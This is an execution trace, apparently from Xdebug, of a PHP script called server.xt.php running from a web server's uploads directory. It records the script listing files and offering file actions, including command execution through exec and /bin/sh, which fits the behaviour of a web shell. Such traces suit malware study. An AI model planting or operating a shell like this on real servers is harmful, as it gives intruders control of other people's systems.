3		A						/var/www/html/uploads/server.xt.php	1250	$file = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	379	0	0.018521	802704	date	0		/var/www/html/uploads/server.xt.php	1252	2	'n/j/y H:i:s'	1676253117
4	379	1	0.018553	803032
4	379	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1252	$timestamps = 'mtime: 2/12/23 20:51:57, '
4	380	0	0.018580	802648	date	0		/var/www/html/uploads/server.xt.php	1253	2	'n/j/y H:i:s'	1676253117
4	380	1	0.018610	802976
4	380	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1253	$timestamps .= 'atime: 2/12/23 20:51:57, '
4	381	0	0.018636	802672	date	0		/var/www/html/uploads/server.xt.php	1254	2	'n/j/y H:i:s'	1676253117
4	381	1	0.018666	803000
4	381	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1254	$timestamps .= 'ctime: 2/12/23 20:51:57'
4	382	0	0.018693	802896	html	1		/var/www/html/uploads/server.xt.php	1258	1	'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
5	383	0	0.018707	802896	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'	2	NULL
5	383	1	0.018724	803200
5	383	R			'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
4	382	1	0.018740	803088
4	382	R			'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
4	384	0	0.018756	802704	substr	0		/var/www/html/uploads/server.xt.php	1289	3	'prepend.php'	0	1
4	384	1	0.018770	802800
4	384	R			'p'
4	385	0	0.018784	802784	urlencode	0		/var/www/html/uploads/server.xt.php	1296	1	'/var/www/html/uploads/prepend.php'
4	385	1	0.018797	802896
4	385	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fprepend.php'
4	386	0	0.018814	802832	html	1		/var/www/html/uploads/server.xt.php	1296	1	'prepend.php'
5	387	0	0.018827	802832	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'prepend.php'	2	NULL
5	387	1	0.018841	803104
5	387	R			'prepend.php'
4	386	1	0.018855	802992
4	386	R			'prepend.php'
3		A						/var/www/html/uploads/server.xt.php	1306	$human = ''
4	388	0	0.018883	802704	decoct	0		/var/www/html/uploads/server.xt.php	1315	1	33261
4	388	1	0.018896	802776
4	388	R			'100755'
4	389	0	0.018910	802704	function_exists	0		/var/www/html/uploads/server.xt.php	1317	1	'posix_getuid'
4	389	1	0.018923	802744
4	389	R			TRUE
4	390	0	0.018936	802704	posix_getuid	0		/var/www/html/uploads/server.xt.php	1317	0
4	390	1	0.018948	802704
4	390	R			33
3		A						/var/www/html/uploads/server.xt.php	1317	$l = FALSE
4	391	0	0.018971	802704	permission_octal2string	1		/var/www/html/uploads/server.xt.php	1319	1	33261
4		A						/var/www/html/uploads/server.xt.php	966	$type = '-'
4		A						/var/www/html/uploads/server.xt.php	979	$owner = 'r'
4		A						/var/www/html/uploads/server.xt.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/server.xt.php	984	$owner .= 'x'
4		A						/var/www/html/uploads/server.xt.php	987	$group = 'r'
4		A						/var/www/html/uploads/server.xt.php	988	$group .= '-'
4		A						/var/www/html/uploads/server.xt.php	992	$group .= 'x'
4		A						/var/www/html/uploads/server.xt.php	995	$other = 'r'
4		A						/var/www/html/uploads/server.xt.php	996	$other .= '-'
4		A						/var/www/html/uploads/server.xt.php	1000	$other .= 'x'
4	391	1	0.019084	802744
4	391	R			'-rwxr-xr-x'
4	392	0	0.019098	802744	html	1		/var/www/html/uploads/server.xt.php	1319	1	'-rwxr-xr-x'
5	393	0	0.019111	802744	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'-rwxr-xr-x'	2	NULL
5	393	1	0.019125	803016
5	393	R			'-rwxr-xr-x'
4	392	1	0.019139	802904
4	392	R			'-rwxr-xr-x'
4	394	0	0.019153	802704	array_key_exists	0		/var/www/html/uploads/server.xt.php	1324	2	'owner_name'	['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	394	1	0.019182	802768
4	394	R			TRUE
4	395	0	0.019196	802704	array_key_exists	0		/var/www/html/uploads/server.xt.php	1330	2	'group_name'	['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	395	1	0.019224	802768
4	395	R			TRUE
4	396	0	0.019238	802800	html	1		/var/www/html/uploads/server.xt.php	1339	1	'/var/www/html/uploads/prepend.php'
5	397	0	0.019252	802800	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'/var/www/html/uploads/prepend.php'	2	NULL
5	397	1	0.019267	803072
5	397	R			'/var/www/html/uploads/prepend.php'
4	396	1	0.019283	802960
4	396	R			'/var/www/html/uploads/prepend.php'
3		A						/var/www/html/uploads/server.xt.php	1342	$actions = []
4	398	0	0.019308	802328	function_exists	0		/var/www/html/uploads/server.xt.php	1343	1	'symlink'
4	398	1	0.019322	802368
4	398	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	1344	$actions[] = 'create_symlink'
4	399	0	0.019346	802704	dirname	0		/var/www/html/uploads/server.xt.php	1346	1	'/var/www/html/uploads/prepend.php'
4	399	1	0.019359	802800
4	399	R			'/var/www/html/uploads'
4	400	0	0.019374	802768	is_writable	0		/var/www/html/uploads/server.xt.php	1346	1	'/var/www/html/uploads'
4	400	1	0.019390	802808
4	400	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/server.xt.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/server.xt.php	1349	$actions[] = 'move'
3		A						/var/www/html/uploads/server.xt.php	1352	$actions[] = 'copy'
3		A						/var/www/html/uploads/server.xt.php	1353	$actions[] = 'download'
4	401	0	0.019455	802704	function_exists	0		/var/www/html/uploads/server.xt.php	1356	1	'exec'
4	401	1	0.019468	802744
4	401	R			TRUE
4	402	0	0.019481	802704	file_exists	0		/var/www/html/uploads/server.xt.php	1356	1	'/bin/sh'
4	402	1	0.019500	802744
4	402	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	1357	$actions[] = 'execute'
4	403	0	0.019523	802704	sizeof	0		/var/www/html/uploads/server.xt.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move', 4 => 'copy', 5 => 'download', 6 => 'execute']
4	403	1	0.019543	802736
4	403	R			7
4	404	0	0.019561	802800	str_repeat	0		/var/www/html/uploads/server.xt.php	1363	2	'&nbsp;'	30
4	404	1	0.019575	803088
4	404	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	405	0	0.019591	802768	word	1		/var/www/html/uploads/server.xt.php	1367	1	'create_symlink'
5	406	0	0.019604	802768	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'create symlink'	2	'UTF-8'
5	406	1	0.019620	803040
5	406	R			'create symlink'
4	405	1	0.019635	802928
4	405	R			'create symlink'
4	407	0	0.019650	802760	word	1		/var/www/html/uploads/server.xt.php	1367	1	'delete'
5	408	0	0.019662	802760	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'delete'	2	'UTF-8'
5	408	1	0.019677	803032
5	408	R			'delete'
4	407	1	0.019691	802920
4	407	R			'delete'
4	409	0	0.019704	802760	word	1		/var/www/html/uploads/server.xt.php	1367	1	'rename'
5	410	0	0.019717	802760	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'rename'	2	'UTF-8'
5	410	1	0.019734	803032
5	410	R			'rename'
4	409	1	0.019788	802920
4	409	R			'rename'
4	411	0	0.019803	802752	word	1		/var/www/html/uploads/server.xt.php	1367	1	'move'
5	412	0	0.019817	802752	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'move'	2	'UTF-8'
5	412	1	0.019831	803024
5	412	R			'move'
4	411	1	0.019844	802912
4	411	R			'move'
4	413	0	0.019858	802752	word	1		/var/www/html/uploads/server.xt.php	1367	1	'copy'
5	414	0	0.019870	802752	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'copy'	2	'UTF-8'
5	414	1	0.019884	803024
5	414	R			'copy'
4	413	1	0.019897	802912
4	413	R			'copy'
4	415	0	0.019911	802760	word	1		/var/www/html/uploads/server.xt.php	1367	1	'download'
5	416	0	0.019924	802760	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'download'	2	'UTF-8'
5	416	1	0.019938	803032
5	416	R			'download'
4	415	1	0.019951	802920
4	415	R			'download'
4	417	0	0.019964	802760	word	1		/var/www/html/uploads/server.xt.php	1367	1	'execute'
5	418	0	0.019977	802760	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'execute'	2	'UTF-8'
5	418	1	0.019991	803032
5	418	R			'execute'
4	417	1	0.020005	802920
4	417	R			'execute'
3		A						/var/www/html/uploads/server.xt.php	1249	$i++
4	419	0	0.020030	802704	sizeof	0		/var/www/html/uploads/server.xt.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	419	1	0.020103	802736
4	419	R			6
3		A						/var/www/html/uploads/server.xt.php	1250	$file = ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	420	0	0.020145	802704	date	0		/var/www/html/uploads/server.xt.php	1252	2	'n/j/y H:i:s'	1676253117
4	420	1	0.020179	803032
4	420	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1252	$timestamps = 'mtime: 2/12/23 20:51:57, '
4	421	0	0.020206	802648	date	0		/var/www/html/uploads/server.xt.php	1253	2	'n/j/y H:i:s'	1676253117
4	421	1	0.020236	802976
4	421	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1253	$timestamps .= 'atime: 2/12/23 20:51:57, '
4	422	0	0.020299	802672	date	0		/var/www/html/uploads/server.xt.php	1254	2	'n/j/y H:i:s'	1676253117
4	422	1	0.020331	803000
4	422	R			'2/12/23 20:51:57'
3		A						/var/www/html/uploads/server.xt.php	1254	$timestamps .= 'ctime: 2/12/23 20:51:57'
4	423	0	0.020358	802896	html	1		/var/www/html/uploads/server.xt.php	1258	1	'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
5	424	0	0.020372	802896	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'	2	NULL
5	424	1	0.020390	803200
5	424	R			'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
4	423	1	0.020406	803088
4	423	R			'mtime: 2/12/23 20:51:57, atime: 2/12/23 20:51:57, ctime: 2/12/23 20:51:57'
4	425	0	0.020428	802704	substr	0		/var/www/html/uploads/server.xt.php	1289	3	'server.xt.php'	0	1
4	425	1	0.020443	802800
4	425	R			's'
4	426	0	0.020457	802784	urlencode	0		/var/www/html/uploads/server.xt.php	1296	1	'/var/www/html/uploads/server.xt.php'
4	426	1	0.020470	802896
4	426	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fserver.xt.php'
4	427	0	0.020487	802832	html	1		/var/www/html/uploads/server.xt.php	1296	1	'server.xt.php'
5	428	0	0.020499	802832	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'server.xt.php'	2	NULL
5	428	1	0.020514	803104
5	428	R			'server.xt.php'
4	427	1	0.020528	802992
4	427	R			'server.xt.php'
4	429	0	0.020543	802704	human_filesize	1		/var/www/html/uploads/server.xt.php	1304	1	77659
4		A						/var/www/html/uploads/server.xt.php	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/server.xt.php	1155	$n = 0
4		A						/var/www/html/uploads/server.xt.php	1157	$filesize /= 1024
4		A						/var/www/html/uploads/server.xt.php	1158	$n++
5	430	0	0.020598	802704	strpos	0		/var/www/html/uploads/server.xt.php	1161	2	75.8388671875	'.'
5	430	1	0.020614	803032
5	430	R			2
5	431	0	0.020628	802704	round	0		/var/www/html/uploads/server.xt.php	1161	2	75.8388671875	1
5	431	1	0.020643	802776
5	431	R			75.8
4		A						/var/www/html/uploads/server.xt.php	1161	$filesize = 75.8
5	432	0	0.020667	802704	strpos	0		/var/www/html/uploads/server.xt.php	1163	2	75.8	'.'
5	432	1	0.020681	803032
5	432	R			2
5	433	0	0.020694	802704	substr	0		/var/www/html/uploads/server.xt.php	1164	3	75.8	-1	1
5	433	1	0.020708	803056
5	433	R			'8'
5	434	0	0.020721	802704	in_array	0		/var/www/html/uploads/server.xt.php	1164	2	'8'	[0 => '0', 1 => '.']
5	434	1	0.020739	802776
5	434	R			FALSE
5	435	0	0.020753	802704	substr	0		/var/www/html/uploads/server.xt.php	1169	3	'kMGTPE'	0	1
5	435	1	0.020766	802800
5	435	R			'k'
4		A						/var/www/html/uploads/server.xt.php	1169	$suffix = 'k'
4	429	1	0.020791	802736
4	429	R			'75.8 kB'
3		A						/var/www/html/uploads/server.xt.php	1304	$human = ' title="75.8 kB"'
4	436	0	0.020818	802752	decoct	0		/var/www/html/uploads/server.xt.php	1315	1	33204
4	436	1	0.020830	802824
4	436	R			'100664'
4	437	0	0.020844	802752	function_exists	0		/var/www/html/uploads/server.xt.php	1317	1	'posix_getuid'
4	437	1	0.020857	802792
4	437	R			TRUE
4	438	0	0.020870	802752	posix_getuid	0		/var/www/html/uploads/server.xt.php	1317	0
4	438	1	0.020883	802752
4	438	R			33
3		A						/var/www/html/uploads/server.xt.php	1317	$l = FALSE
4	439	0	0.020906	802752	permission_octal2string	1		/var/www/html/uploads/server.xt.php	1319	1	33204
4		A						/var/www/html/uploads/server.xt.php	966	$type = '-'
4		A						/var/www/html/uploads/server.xt.php	979	$owner = 'r'
4		A						/var/www/html/uploads/server.xt.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/server.xt.php	984	$owner .= '-'
4		A						/var/www/html/uploads/server.xt.php	987	$group = 'r'
4		A						/var/www/html/uploads/server.xt.php	988	$group .= 'w'
4		A						/var/www/html/uploads/server.xt.php	992	$group .= '-'
4		A						/var/www/html/uploads/server.xt.php	995	$other = 'r'
4		A						/var/www/html/uploads/server.xt.php	996	$other .= '-'
4		A						/var/www/html/uploads/server.xt.php	1000	$other .= '-'
4	439	1	0.021021	802792
4	439	R			'-rw-rw-r--'
4	440	0	0.021035	802792	html	1		/var/www/html/uploads/server.xt.php	1319	1	'-rw-rw-r--'
5	441	0	0.021048	802792	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'-rw-rw-r--'	2	NULL
5	441	1	0.021063	803064
5	441	R			'-rw-rw-r--'
4	440	1	0.021077	802952
4	440	R			'-rw-rw-r--'
4	442	0	0.021091	802752	array_key_exists	0		/var/www/html/uploads/server.xt.php	1324	2	'owner_name'	['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	442	1	0.021122	802816
4	442	R			TRUE
4	443	0	0.021135	802752	array_key_exists	0		/var/www/html/uploads/server.xt.php	1330	2	'group_name'	['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	443	1	0.021169	802816
4	443	R			TRUE
4	444	0	0.021183	802848	html	1		/var/www/html/uploads/server.xt.php	1339	1	'/var/www/html/uploads/server.xt.php'
5	445	0	0.021196	802848	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'/var/www/html/uploads/server.xt.php'	2	NULL
5	445	1	0.021211	803120
5	445	R			'/var/www/html/uploads/server.xt.php'
4	444	1	0.021227	803008
4	444	R			'/var/www/html/uploads/server.xt.php'
3		A						/var/www/html/uploads/server.xt.php	1342	$actions = []
4	446	0	0.021252	802376	function_exists	0		/var/www/html/uploads/server.xt.php	1343	1	'symlink'
4	446	1	0.021266	802416
4	446	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	1344	$actions[] = 'create_symlink'
4	447	0	0.021290	802752	dirname	0		/var/www/html/uploads/server.xt.php	1346	1	'/var/www/html/uploads/server.xt.php'
4	447	1	0.021303	802848
4	447	R			'/var/www/html/uploads'
4	448	0	0.021317	802816	is_writable	0		/var/www/html/uploads/server.xt.php	1346	1	'/var/www/html/uploads'
4	448	1	0.021340	802856
4	448	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/server.xt.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/server.xt.php	1349	$actions[] = 'move'
3		A						/var/www/html/uploads/server.xt.php	1352	$actions[] = 'copy'
3		A						/var/www/html/uploads/server.xt.php	1353	$actions[] = 'download'
4	449	0	0.021404	802752	function_exists	0		/var/www/html/uploads/server.xt.php	1356	1	'exec'
4	449	1	0.021417	802792
4	449	R			TRUE
4	450	0	0.021430	802752	sizeof	0		/var/www/html/uploads/server.xt.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move', 4 => 'copy', 5 => 'download']
4	450	1	0.021449	802784
4	450	R			6
4	451	0	0.021461	802848	str_repeat	0		/var/www/html/uploads/server.xt.php	1363	2	'&nbsp;'	30
4	451	1	0.021475	803136
4	451	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	452	0	0.021491	802816	word	1		/var/www/html/uploads/server.xt.php	1367	1	'create_symlink'
5	453	0	0.021505	802816	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'create symlink'	2	'UTF-8'
5	453	1	0.021520	803088
5	453	R			'create symlink'
4	452	1	0.021535	802976
4	452	R			'create symlink'
4	454	0	0.021549	802808	word	1		/var/www/html/uploads/server.xt.php	1367	1	'delete'
5	455	0	0.021570	802808	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'delete'	2	'UTF-8'
5	455	1	0.021584	803080
5	455	R			'delete'
4	454	1	0.021598	802968
4	454	R			'delete'
4	456	0	0.021611	802808	word	1		/var/www/html/uploads/server.xt.php	1367	1	'rename'
5	457	0	0.021624	802808	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'rename'	2	'UTF-8'
5	457	1	0.021638	803080
5	457	R			'rename'
4	456	1	0.021651	802968
4	456	R			'rename'
4	458	0	0.021664	802800	word	1		/var/www/html/uploads/server.xt.php	1367	1	'move'
5	459	0	0.021677	802800	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'move'	2	'UTF-8'
5	459	1	0.021691	803072
5	459	R			'move'
4	458	1	0.021704	802960
4	458	R			'move'
4	460	0	0.021717	802800	word	1		/var/www/html/uploads/server.xt.php	1367	1	'copy'
5	461	0	0.021730	802800	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'copy'	2	'UTF-8'
5	461	1	0.021744	803072
5	461	R			'copy'
4	460	1	0.021757	802960
4	460	R			'copy'
4	462	0	0.021771	802808	word	1		/var/www/html/uploads/server.xt.php	1367	1	'download'
5	463	0	0.021784	802808	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'download'	2	'UTF-8'
5	463	1	0.021798	803080
5	463	R			'download'
4	462	1	0.021812	802968
4	462	R			'download'
3		A						/var/www/html/uploads/server.xt.php	1249	$i++
4	464	0	0.021836	802752	sizeof	0		/var/www/html/uploads/server.xt.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	464	1	0.021915	802784
4	464	R			6
4	465	0	0.021930	802976	sizeof	0		/var/www/html/uploads/server.xt.php	1385	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	465	1	0.022000	803008
